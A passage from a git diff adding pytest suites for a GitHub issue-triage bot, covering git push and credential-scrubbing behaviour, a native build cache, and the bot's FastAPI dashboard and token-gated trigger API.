clone_url; the remote MUST be rewritten BEFORE fetch. + mgr.ensure_workspace( + repo="octo/widget", + number=7, + title="t", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + config_after = (pool / ".git" / "config").read_text() + assert "ghp_seekrit" not in config_after, config_after + assert "bot:" not in config_after, config_after + # Origin now points at the clean URL. + url = subprocess.run( + ["git", "-C", str(pool), "remote", "get-url", "origin"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + assert url == str(upstream_repo) + + +def test_push_force_with_lease_succeeds_after_local_amend(tmp_path: Path, upstream_repo: Path) -> None: + """An agent amending an already-pushed commit (e.g. `--reset-author`) must + still be able to push: `--force-with-lease` allows the local rewrite as + long as origin still matches what we last fetched.""" + from robomp.git_ops import push as git_push + + # Clone, make a commit, push, then amend and push again. + work = tmp_path / "work" + _git(["clone", str(upstream_repo), str(work)], cwd=tmp_path) + _git(["-C", str(work), "config", "user.email", "t@t"], cwd=tmp_path) + _git(["-C", str(work), "config", "user.name", "t"], cwd=tmp_path) + _git(["-C", str(work), "checkout", "-b", "farm/abc/topic"], cwd=tmp_path) + (work / "x.txt").write_text("a\n") + _git(["-C", str(work), "add", "x.txt"], cwd=tmp_path) + _git(["-C", str(work), "commit", "-m", "initial"], cwd=tmp_path) + git_push(work, branch="farm/abc/topic", expected_head=None, token=None) + + # Amend (rewrites the SHA at origin/farm/abc/topic). + (work / "x.txt").write_text("a-amended\n") + _git(["-C", str(work), "add", "x.txt"], cwd=tmp_path) + _git(["-C", str(work), "commit", "--amend", "--no-edit"], cwd=tmp_path) + amended = subprocess.run( + ["git", "-C", str(work), "rev-parse", "HEAD"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + result = git_push(work, branch="farm/abc/topic", expected_head=None, token=None) + assert result.head == amended + + # Origin's branch ref now matches the amended SHA. + on_origin = subprocess.run( + ["git", "-C", str(upstream_repo), "rev-parse", "refs/heads/farm/abc/topic"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + assert on_origin == amended + + +def test_push_force_with_lease_refuses_when_origin_moved(tmp_path: Path, upstream_repo: Path) -> None: + """If origin's branch ref has been moved by some other writer between our + last fetch and this push, the lease MUST refuse — even though we're + force-pushing.""" + from robomp.git_ops import GitCommandError + from robomp.git_ops import push as git_push + + work = tmp_path / "work" + _git(["clone", str(upstream_repo), str(work)], cwd=tmp_path) + _git(["-C", str(work), "config", "user.email", "t@t"], cwd=tmp_path) + _git(["-C", str(work), "config", "user.name", "t"], cwd=tmp_path) + _git(["-C", str(work), "checkout", "-b", "farm/abc/topic"], cwd=tmp_path) + (work / "x.txt").write_text("a\n") + _git(["-C", str(work), "add", "x.txt"], cwd=tmp_path) + _git(["-C", str(work), "commit", "-m", "initial"], cwd=tmp_path) + git_push(work, branch="farm/abc/topic", expected_head=None, token=None) + + # A "sneaky" second writer publishes a different SHA to the same ref on + # origin — pushed from an independent worktree, NOT seen by `work`'s + # remote-tracking ref. + intruder = tmp_path / "intruder" + _git(["clone", str(upstream_repo), str(intruder)], cwd=tmp_path) + _git(["-C", str(intruder), "config", "user.email", "i@i"], cwd=tmp_path) + _git(["-C", str(intruder), "config", "user.name", "i"], cwd=tmp_path) + _git(["-C", str(intruder), "checkout", "-b", "farm/abc/topic", "origin/farm/abc/topic"], cwd=tmp_path) + (intruder / "x.txt").write_text("from-intruder\n") + _git(["-C", str(intruder), "add", "x.txt"], cwd=tmp_path) + _git(["-C", str(intruder), "commit", "--amend", "--no-edit"], cwd=tmp_path) + _git(["-C", str(intruder), "push", "--force", "origin", "farm/abc/topic"], cwd=tmp_path) + + # Now `work` tries to push another amended commit. The lease pins the + # expected origin SHA to whatever `work`'s remote-tracking ref still + # records — which is now stale — so origin's actual SHA differs and the + # push must be refused. + (work / "x.txt").write_text("from-us\n") + _git(["-C", str(work), "add", "x.txt"], cwd=tmp_path) + _git(["-C", str(work), "commit", "--amend", "--no-edit"], cwd=tmp_path) + with pytest.raises(GitCommandError) as exc: + git_push(work, branch="farm/abc/topic", expected_head=None, token=None) + assert ( + "stale info" in (exc.value.stderr + exc.value.stdout).lower() + or "rejected" in (exc.value.stderr + exc.value.stdout).lower() + ) + + +def test_run_git_injects_safe_directory_and_subprocess_identity( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + from robomp.git_ops import _run_git + + captured: dict[str, object] = {} + + def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]: + captured["cmd"] = cmd + captured.update(kwargs) + return subprocess.CompletedProcess(cmd, 0, "", "") + + monkeypatch.setattr("robomp.git_ops.subprocess.run", fake_run) + + _run_git( + ["status"], + cwd=tmp_path, + token=None, + safe_directory=Path("/x"), + user=2001, + group=2001, + extra_groups=[2000], + umask=0o002, + ) + + env = captured["env"] + assert isinstance(env, dict) + assert env["GIT_CONFIG_COUNT"] == "1" + assert env["GIT_CONFIG_KEY_0"] == "safe.directory" + assert env["GIT_CONFIG_VALUE_0"] == "/x" + assert captured["user"] == 2001 + assert captured["group"] == 2001 + assert captured["extra_groups"] == [2000] + assert captured["umask"] == 0o002 + + +def test_run_git_kills_hung_child(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + """A `git` invocation that hangs past the timeout must be killed and + raised as `GitCommandError(124)` rather than pinning the calling + thread. The proxy already bounds the async caller via + `asyncio.wait_for`, but the OS process only goes away because of this + timeout.""" + from robomp.git_ops import GitCommandError, _run_git + + fakebin = tmp_path / "bin" + fakebin.mkdir() + fake_git = fakebin / "git" + # Use `exec /bin/sleep 30` so the kill from `subprocess.run`'s timeout + # actually terminates the wait — `sh` with a non-exec `sleep` would + # keep the parent alive on SIGTERM, and the absolute path means the + # shim doesn't depend on PATH (we point PATH at fakebin so `git` + # itself resolves to our shim). + fake_git.write_text("#!/bin/sh\nexec /bin/sleep 30\n") + fake_git.chmod(0o755) + monkeypatch.setenv("PATH", str(fakebin)) + + with pytest.raises(GitCommandError) as exc: + _run_git(["status"], cwd=tmp_path, token=None, timeout=0.5) + assert exc.value.returncode == 124 + assert "timed out" in exc.value.stderr.lower() + + +# --------------------------------------------------------------------------- +# NativesCache integration into ensure_workspace +# --------------------------------------------------------------------------- + + +def _seed_native_dir(repo_dir: Path) -> Path: + native_dir = repo_dir / "packages" / "natives" / "native" + native_dir.mkdir(parents=True, exist_ok=True) + return native_dir + + +def test_ensure_workspace_without_cache_leaves_native_dir_untouched(tmp_path: Path, upstream_repo: Path) -> None: + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=10, + title="no cache", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + assert mgr.natives_cache is None + # No `packages/natives/native/` was tracked in the upstream, and no cache + # is configured → the directory wasn't created by populate. + assert not (ws.repo_dir / "packages" / "natives" / "native").exists() + + +def test_ensure_workspace_populates_from_natives_cache(tmp_path: Path, upstream_repo: Path) -> None: + from robomp.natives_cache import NativesCache, compute_key, target_triple + + cache = NativesCache(tmp_path / "natives-cache") + mgr = SandboxManager(tmp_path / "workspaces", natives_cache=cache) + + # First workspace: stage built artifacts, capture under the workspace's key. + ws1 = mgr.ensure_workspace( + repo="octo/widget", + number=11, + title="producer", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + native_dir1 = _seed_native_dir(ws1.repo_dir) + # Mirror the napi build output set. The filename must match the live + # `target_triple()` value or the populate path won't recognize it. + triple = target_triple() + (native_dir1 / f"pi_natives.{triple}.node").write_bytes(b"ELFx") + (native_dir1 / "index.d.ts").write_text("export const X: number;\n") + (native_dir1 / "index.js").write_text("export const X = 1;\n") + (native_dir1 / "embedded-addon.js").write_text("export const embeddedAddon = null;\n") + key = compute_key(ws1.repo_dir) # default target = target_triple() + assert cache.capture("octo/widget", key, native_dir1) is not None + + # Second workspace on the same source HEAD: ensure_workspace auto-populates. + # We force the same key by pinning TARGET_VARIANT (only relevant on x64; + # harmless on arm64) — actually compute_key uses target_triple() at call + # time. To make the test platform-independent, override populate to use + # the same key explicitly. + ws2 = mgr.ensure_workspace( + repo="octo/widget", + number=12, + title="consumer", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + native_dir2 = ws2.repo_dir / "packages" / "natives" / "native" + # The auto-populate path used the real target_triple() — which matches + # the host that just captured. So the same key applies and files appear. + assert native_dir2.is_dir(), "populate should have created native/ on hit" + node_name = f"pi_natives.{triple}.node" + assert (native_dir2 / node_name).read_bytes() == b"ELFx" + # The .node is hardlinked, sharing the cache's inode. + cached_node = cache.entry_dir("octo/widget", key) / node_name + ws2_node = native_dir2 / node_name + assert cached_node.stat().st_ino == ws2_node.stat().st_ino + + +def test_ensure_workspace_cache_miss_is_silent_noop(tmp_path: Path, upstream_repo: Path) -> None: + from robomp.natives_cache import NativesCache + + cache = NativesCache(tmp_path / "empty-cache") + mgr = SandboxManager(tmp_path / "workspaces", natives_cache=cache) + ws = mgr.ensure_workspace( + repo="octo/widget", + number=13, + title="miss", + clone_url=str(upstream_repo), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + # Cache is empty so the workspace ends up identical to the no-cache case. + assert ws.repo_dir.is_dir() + assert not (ws.repo_dir / "packages" / "natives" / "native").exists() diff --git a/python/robomp/tests/test_server.py b/python/robomp/tests/test_server.py new file mode 100644 index 000000000..2e7d284e1 --- /dev/null +++ b/python/robomp/tests/test_server.py @@ -0,0 +1,2331 @@ +"""End-to-end coverage for the FastAPI surface (dashboard + JSON APIs).""" + +from __future__ import annotations + +import hashlib +import hmac +import json +from pathlib import Path + +import httpx +import pytest +from fastapi.testclient import TestClient + +from robomp.config import Settings, reset_settings_cache +from robomp.dashboard import tail_jsonl +from robomp.db import Database, close_database, get_database, issue_key +from robomp.github_client import GitHubClient +from robomp.manual_triage import InvalidIssueRef, ManualTriageTimeout, await_terminal_state, parse_issue_ref +from robomp.sandbox import LocalGitTransport +from robomp.server import create_app + + +def _seed_db(settings: Settings) -> None: + db = get_database(settings.sqlite_path) + db.record_event( + delivery_id="d-queued", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 1), + payload={"action": "opened", "issue": {"number": 1}}, + ) + db.record_event( + delivery_id="d-skipped", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 2), + payload={"action": "labeled"}, + state="skipped", + ) + # Promote one event to "running" so the running_events list isn't empty. + db.record_event( + delivery_id="d-running", + event_type="issue_comment", + repo="octo/widget", + issue_key=issue_key("octo/widget", 3), + payload={"action": "created"}, + ) + claimed = db.claim_next_event() + assert claimed is not None # d-queued or d-running depending on order + # Make sure at least one event is in running state for our assertions. + db.upsert_issue( + key=issue_key("octo/widget", 3), + repo="octo/widget", + number=3, + state="opened", + branch="farm/abc12345/fix", + pr_number=42, + ) + db.set_issue_classification(issue_key("octo/widget", 3), "bug") + + +def test_index_serves_dashboard_html(settings: Settings) -> None: + app = create_app(settings) + with TestClient(app) as client: + resp = client.get("/") + assert resp.status_code == 200 + assert resp.headers["content-type"].startswith("text/html") + # Stable anchors only. The Vite bundle hashes its asset filenames on every + # build, but the structural skeleton (title, mount node, config script) + # has to stay intact for the SPA to bootstrap. + assert "robomp" in resp.text + assert 'id="app"' in resp.text + assert 'id="robomp-config"' in resp.text + # The sentinel must have been substituted — neither the literal sentinel + # nor an empty script body is acceptable. + assert "__ROBOMP_CONFIG__" not in resp.text + assert '"replayEnabled":' in resp.text + + +def test_index_substitutes_replay_token(env, monkeypatch: pytest.MonkeyPatch) -> None: + """When a replay token is set, the config blob exposes it to the SPA.""" + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", "secret-token-7") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + try: + with TestClient(app) as client: + resp = client.get("/") + assert resp.status_code == 200 + assert '"replayEnabled":true' in resp.text + assert '"replayToken":"secret-token-7"' in resp.text + finally: + close_database() + + +def test_api_status_reports_runtime_counts_and_inflight(settings: Settings) -> None: + app = create_app(settings) + with TestClient(app) as client: + _seed_db(settings) + resp = client.get("/api/status") + close_database() + + assert resp.status_code == 200 + body = resp.json() + + runtime = body["runtime"] + assert runtime["bot_login"] == "robomp-bot" + assert runtime["repo_allowlist"] == ["octo/widget"] + assert runtime["max_concurrency"] == settings.max_concurrency + assert runtime["model"] == settings.model + assert runtime["uptime_seconds"] >= 0 + + counts = body["event_counts"] + # All five buckets must be present even when zero — the UI relies on it. + assert set(counts) == {"queued", "running", "done", "failed", "skipped"} + assert counts["queued"] + counts["running"] == 2 # d-queued + d-running + assert counts["skipped"] == 1 + assert counts["running"] >= 1 + + running = body["running_events"] + assert running, "expected at least one running event after claim" + assert all(r["started_at"] for r in running) + + # No worker pool was started in TestClient lifespan? It actually is — verify + # the inflight snapshot returns a list even when empty. + assert isinstance(body["inflight"], list) + + issues = {i["key"]: i for i in body["issues"]} + fix_key = issue_key("octo/widget", 3) + assert fix_key in issues + assert issues[fix_key]["classification"] == "bug" + assert issues[fix_key]["pr_number"] == 42 + assert issues[fix_key]["branch"] == "farm/abc12345/fix" + + delivery_ids = {e["delivery_id"] for e in body["recent_events"]} + assert {"d-queued", "d-skipped", "d-running"}.issubset(delivery_ids) + + +def test_api_status_reports_current_issue_event_state(settings: Settings) -> None: + app = create_app(settings) + fixed = issue_key("octo/widget", 44) + failed = issue_key("octo/widget", 69) + with TestClient(app) as client: + db = get_database(settings.sqlite_path) + db.upsert_issue(key=fixed, repo="octo/widget", number=44, state="closed", pr_number=1084) + db.upsert_issue(key=failed, repo="octo/widget", number=69, state="reproducing") + db.record_event( + delivery_id="fixed-old-failure", + event_type="issues", + repo="octo/widget", + issue_key=fixed, + payload={"action": "opened"}, + state="failed", + ) + db.record_event( + delivery_id="fixed-later-success", + event_type="issues", + repo="octo/widget", + issue_key=fixed, + payload={"action": "closed"}, + state="done", + ) + db.record_event( + delivery_id="still-failed", + event_type="issues", + repo="octo/widget", + issue_key=failed, + payload={"action": "opened"}, + state="failed", + ) + db.record_event( + delivery_id="failed-label-noise", + event_type="issues", + repo="octo/widget", + issue_key=failed, + payload={"action": "labeled"}, + state="skipped", + last_error="issues.labeled ignored", + ) + + resp = client.get("/api/status") + close_database() + + assert resp.status_code == 200 + body = resp.json() + assert body["event_counts"]["failed"] == 2 + assert body["issue_event_counts"]["failed"] == 1 + assert body["issue_event_counts"]["done"] == 1 + assert body["issue_event_counts"]["skipped"] == 0 + + issues = {i["key"]: i for i in body["issues"]} + assert issues[fixed]["latest_event"]["delivery_id"] == "fixed-later-success" + assert issues[fixed]["latest_event"]["state"] == "done" + assert issues[failed]["latest_event"]["delivery_id"] == "still-failed" + assert issues[failed]["latest_event"]["state"] == "failed" + + +def test_api_logs_returns_empty_when_file_missing(settings: Settings) -> None: + app = create_app(settings) + with TestClient(app) as client: + resp = client.get("/api/logs?limit=10") + close_database() + assert resp.status_code == 200 + body = resp.json() + assert body == {"entries": [], "count": 0, "limit": 10} + + +def test_api_logs_tails_jsonl_file(settings: Settings) -> None: + log_path = settings.log_dir / "robomp.log.jsonl" + log_path.parent.mkdir(parents=True, exist_ok=True) + payloads = [ + {"ts": "2026-05-14T21:28:28Z", "level": "INFO", "logger": "robomp.queue", "msg": "dispatch loop online"}, + { + "ts": "2026-05-14T21:28:54Z", + "level": "INFO", + "logger": "robomp.server", + "msg": "skip", + "event": "issues", + "reason": "issues.labeled ignored", + }, + {"ts": "2026-05-14T21:30:00Z", "level": "WARNING", "logger": "robomp.queue", "msg": "tool_end", "ok": False}, + ] + log_path.write_text("\n".join(json.dumps(p) for p in payloads) + "\n", encoding="utf-8") + + app = create_app(settings) + with TestClient(app) as client: + resp = client.get("/api/logs?limit=2") + close_database() + + assert resp.status_code == 200 + body = resp.json() + assert body["count"] == 2 + assert body["limit"] == 2 + # Oldest of the requested window first. + assert body["entries"][0]["msg"] == "skip" + assert body["entries"][1]["msg"] == "tool_end" + assert body["entries"][1]["level"] == "WARNING" + + +def test_api_logs_limit_is_clamped(settings: Settings) -> None: + app = create_app(settings) + with TestClient(app) as client: + too_low = client.get("/api/logs?limit=0").json() + too_high = client.get("/api/logs?limit=99999").json() + close_database() + assert too_low["limit"] == 1 + assert too_high["limit"] == 2000 + + +def test_tail_jsonl_recovers_from_garbage_lines(tmp_path: Path) -> None: + path = tmp_path / "noisy.jsonl" + path.write_text( + json.dumps({"ts": "a", "level": "INFO", "msg": "ok"}) + "\n" + "{not json}\n" + json.dumps({"ts": "b", "level": "ERROR", "msg": "bang"}) + "\n", + encoding="utf-8", + ) + rows = tail_jsonl(path, limit=10) + assert len(rows) == 3 + assert rows[0]["msg"] == "ok" + assert rows[1]["level"] == "RAW" + assert rows[1]["msg"] == "{not json}" + assert rows[2]["level"] == "ERROR" + + +# ---------- manual_triage helpers ---------- + + +def test_parse_issue_ref_accepts_owner_repo_hash_number() -> None: + assert parse_issue_ref("octo/widget#42") == ("octo/widget", 42) + assert parse_issue_ref(" octo/widget#42 ") == ("octo/widget", 42) + + +def test_parse_issue_ref_rejects_garbage() -> None: + for bad in ("widget#1", "octo/widget", "octo/widget#abc", "octo widget#1", ""): + with pytest.raises(InvalidIssueRef): + parse_issue_ref(bad) + + +@pytest.mark.asyncio +async def test_await_terminal_state_times_out_with_current_state(db: Database) -> None: + db.record_event( + delivery_id="d-wait", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 42), + payload={"action": "opened"}, + ) + + with pytest.raises(ManualTriageTimeout) as excinfo: + await await_terminal_state(db, "d-wait", poll_interval=0.001, timeout=0.001) + + assert excinfo.value.delivery_id == "d-wait" + assert excinfo.value.state == "queued" + + +# ---------- /api/trigger ---------- + + +def _enable_replay(monkeypatch: pytest.MonkeyPatch) -> str: + token = "trigger-secret" + monkeypatch.setenv("ROBOMP_REPLAY_TOKEN", token) + reset_settings_cache() + return token + + +def _install_github_mock(app, transport: httpx.MockTransport) -> None: + """Replace the real GitHub client with one wired to a MockTransport.""" + app.state.bag["github"] = GitHubClient("token", transport=transport) + + +def test_trigger_returns_404_when_token_disabled(settings: Settings) -> None: + app = create_app(settings) + with TestClient(app) as client: + resp = client.post("/api/trigger", json={"mode": "triage", "issue": "octo/widget#1"}) + close_database() + assert resp.status_code == 404 + assert "trigger disabled" in resp.json()["detail"] + + +def test_trigger_rejects_missing_token(env, monkeypatch: pytest.MonkeyPatch) -> None: + _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + resp = client.post("/api/trigger", json={"mode": "triage", "issue": "octo/widget#1"}) + close_database() + assert resp.status_code == 401 + + +def test_trigger_triage_fetches_and_enqueues(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + captured: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + captured.append(request.url.path) + if request.url.path.endswith("/issues/7"): + return httpx.Response( + 200, + json={ + "number": 7, + "title": "boom", + "body": "details here", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + }, + ) + if request.url.path.endswith("/repos/octo/widget"): + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://github.com/octo/widget.git", + "private": False, + }, + ) + return httpx.Response(404) + + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(handler)) + resp = client.post( + "/api/trigger", + json={"mode": "triage", "issue": "octo/widget#7"}, + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + + assert resp.status_code == 202, resp.text + body = resp.json() + assert body["mode"] == "triage" + assert body["state"] == "queued" + assert body["delivery"] == "manual-octo__widget-7" + # Both endpoints should have been hit on GitHub. + assert any(p.endswith("/issues/7") for p in captured) + assert any(p.endswith("/repos/octo/widget") for p in captured) + + +@pytest.mark.parametrize("state", ["queued", "running"]) +def test_trigger_triage_conflicts_when_manual_delivery_is_active( + env, monkeypatch: pytest.MonkeyPatch, state: str +) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + delivery = "manual-octo__widget-7" + original_payload = {"action": "opened", "issue": {"number": 7, "title": "old"}} + + calls: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + calls.append(request.url.path) + return httpx.Response(500, json={"message": "should not fetch active manual event"}) + + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + db.record_event( + delivery_id=delivery, + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 7), + payload=original_payload, + state=state, + ) + _install_github_mock(app, httpx.MockTransport(handler)) + resp = client.post( + "/api/trigger", + json={"mode": "triage", "issue": "octo/widget#7"}, + headers={"X-Robomp-Replay-Token": token}, + ) + row = get_database(cfg.sqlite_path).get_event(delivery) + close_database() + + assert resp.status_code == 409, resp.text + assert row is not None + assert row.state == state + assert row.payload == original_payload + assert calls == [] + + +@pytest.mark.parametrize("state", ["done", "failed", "skipped"]) +def test_trigger_triage_replaces_inactive_manual_delivery(env, monkeypatch: pytest.MonkeyPatch, state: str) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + delivery = "manual-octo__widget-7" + + def handler(request: httpx.Request) -> httpx.Response: + if request.url.path.endswith("/issues/7"): + return httpx.Response( + 200, + json={ + "number": 7, + "title": "fresh", + "body": "new details", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + }, + ) + if request.url.path.endswith("/repos/octo/widget"): + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://github.com/octo/widget.git", + "private": False, + }, + ) + return httpx.Response(404) + + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + db.record_event( + delivery_id=delivery, + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 7), + payload={"action": "opened", "issue": {"number": 7, "title": "old"}}, + state=state, + ) + _install_github_mock(app, httpx.MockTransport(handler)) + resp = client.post( + "/api/trigger", + json={"mode": "triage", "issue": "octo/widget#7"}, + headers={"X-Robomp-Replay-Token": token}, + ) + row = get_database(cfg.sqlite_path).get_event(delivery) + close_database() + + assert resp.status_code == 202, resp.text + assert row is not None + assert row.state == "queued" + assert row.attempts == 0 + assert row.payload["issue"]["title"] == "fresh" + + +def test_trigger_triage_rejects_pull_request_issue_payload(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + captured: list[str] = [] + + def handler(request: httpx.Request) -> httpx.Response: + captured.append(request.url.path) + if request.url.path.endswith("/issues/7"): + return httpx.Response( + 200, + json={ + "number": 7, + "title": "change", + "body": "details here", + "state": "open", + "user": {"login": "alice"}, + "labels": [{"name": "bug"}], + "pull_request": {"url": "https://api.github.com/repos/octo/widget/pulls/7"}, + }, + ) + if request.url.path.endswith("/repos/octo/widget"): + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": "https://github.com/octo/widget.git", + "private": False, + }, + ) + return httpx.Response(404) + + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(handler)) + resp = client.post( + "/api/trigger", + json={"mode": "triage", "issue": "octo/widget#7"}, + headers={"X-Robomp-Replay-Token": token}, + ) + assert get_database(cfg.sqlite_path).get_event("manual-octo__widget-7") is None + close_database() + + assert resp.status_code == 400, resp.text + assert "pull request" in resp.json()["detail"] + assert any(p.endswith("/issues/7") for p in captured) + assert not any(p.endswith("/repos/octo/widget") for p in captured) + + +def test_trigger_triage_rejects_repo_not_in_allowlist(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, httpx.MockTransport(lambda r: httpx.Response(500))) + resp = client.post( + "/api/trigger", + json={"mode": "triage", "issue": "evil/repo#1"}, + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + assert resp.status_code == 403 + assert "ROBOMP_REPO_ALLOWLIST" in resp.json()["detail"] + + +@pytest.mark.parametrize("state", ["queued", "running"]) +def test_trigger_retry_by_delivery_rejects_active_events( + env, + monkeypatch: pytest.MonkeyPatch, + state: str, +) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + db.record_event( + delivery_id=f"d-{state}", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 5), + payload={"action": "opened", "issue": {"number": 5}}, + state=state, + ) + resp = client.post( + "/api/trigger", + json={"mode": "retry", "delivery_id": f"d-{state}"}, + headers={"X-Robomp-Replay-Token": token}, + ) + assert resp.status_code == 409 + assert state in resp.json()["detail"] + assert get_database(cfg.sqlite_path).get_event(f"d-{state}").state == state + close_database() + + +def test_trigger_triage_surfaces_github_failure(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + transport = httpx.MockTransport(lambda r: httpx.Response(404, json={"message": "Not Found"})) + app = create_app(cfg) + with TestClient(app) as client: + _install_github_mock(app, transport) + resp = client.post( + "/api/trigger", + json={"mode": "triage", "issue": "octo/widget#999"}, + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + assert resp.status_code == 502 + assert "github error" in resp.json()["detail"] + + +def test_trigger_retry_by_delivery_id_requeues(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + db.record_event( + delivery_id="d-old", + event_type="issues", + repo="octo/widget", + issue_key=issue_key("octo/widget", 4), + payload={"action": "opened", "issue": {"number": 4}}, + state="failed", + ) + resp = client.post( + "/api/trigger", + json={"mode": "retry", "delivery_id": "d-old"}, + headers={"X-Robomp-Replay-Token": token}, + ) + assert resp.status_code == 202 + assert get_database(cfg.sqlite_path).get_event("d-old").state == "queued" + close_database() + + +def test_trigger_retry_by_issue_finds_latest_non_skipped_event(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + key = issue_key("octo/widget", 9) + db.record_event( + delivery_id="d-old-1", + event_type="issues", + repo="octo/widget", + issue_key=key, + payload={"a": 1}, + state="failed", + ) + db.record_event( + delivery_id="d-old-2", + event_type="issue_comment", + repo="octo/widget", + issue_key=key, + payload={"a": 2}, + state="done", + ) + db.record_event( + delivery_id="d-label-noise", + event_type="issues", + repo="octo/widget", + issue_key=key, + payload={"a": 3}, + state="skipped", + ) + resp = client.post( + "/api/trigger", + json={"mode": "retry", "issue": "octo/widget#9"}, + headers={"X-Robomp-Replay-Token": token}, + ) + body = resp.json() + assert resp.status_code == 202, body + # Most recently-received non-skipped row wins; ignored label events do not hide it. + assert body["delivery"] == "d-old-2" + retried = get_database(cfg.sqlite_path).get_event("d-old-2") + assert retried is not None + assert retried.state == "queued" + close_database() + + +def test_trigger_retry_by_issue_rejects_active_latest_event(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + key = issue_key("octo/widget", 10) + db.record_event( + delivery_id="d-inactive", + event_type="issues", + repo="octo/widget", + issue_key=key, + payload={"a": 1}, + state="failed", + ) + db.record_event( + delivery_id="d-active", + event_type="issue_comment", + repo="octo/widget", + issue_key=key, + payload={"a": 2}, + state="running", + ) + resp = client.post( + "/api/trigger", + json={"mode": "retry", "issue": "octo/widget#10"}, + headers={"X-Robomp-Replay-Token": token}, + ) + assert resp.status_code == 409 + assert "running" in resp.json()["detail"] + assert get_database(cfg.sqlite_path).get_event("d-active").state == "running" + assert get_database(cfg.sqlite_path).get_event("d-inactive").state == "failed" + close_database() + + +def test_trigger_retry_by_issue_rejects_repo_not_in_allowlist(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + db = get_database(cfg.sqlite_path) + db.record_event( + delivery_id="d-evil", + event_type="issues", + repo="evil/repo", + issue_key=issue_key("evil/repo", 1), + payload={"a": 1}, + state="failed", + ) + resp = client.post( + "/api/trigger", + json={"mode": "retry", "issue": "evil/repo#1"}, + headers={"X-Robomp-Replay-Token": token}, + ) + assert resp.status_code == 403 + assert "ROBOMP_REPO_ALLOWLIST" in resp.json()["detail"] + assert get_database(cfg.sqlite_path).get_event("d-evil").state == "failed" + close_database() + + +def test_trigger_retry_unknown_delivery_404s(env, monkeypatch: pytest.MonkeyPatch) -> None: + token = _enable_replay(monkeypatch) + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + app = create_app(cfg) + with TestClient(app) as client: + resp = client.post( + "/api/trigger", + json={"mode": "retry", "delivery_id": "nope"}, + headers={"X-Robomp-Replay-Token": token}, + ) + close_database() + assert resp.status_code == 404 + + +def 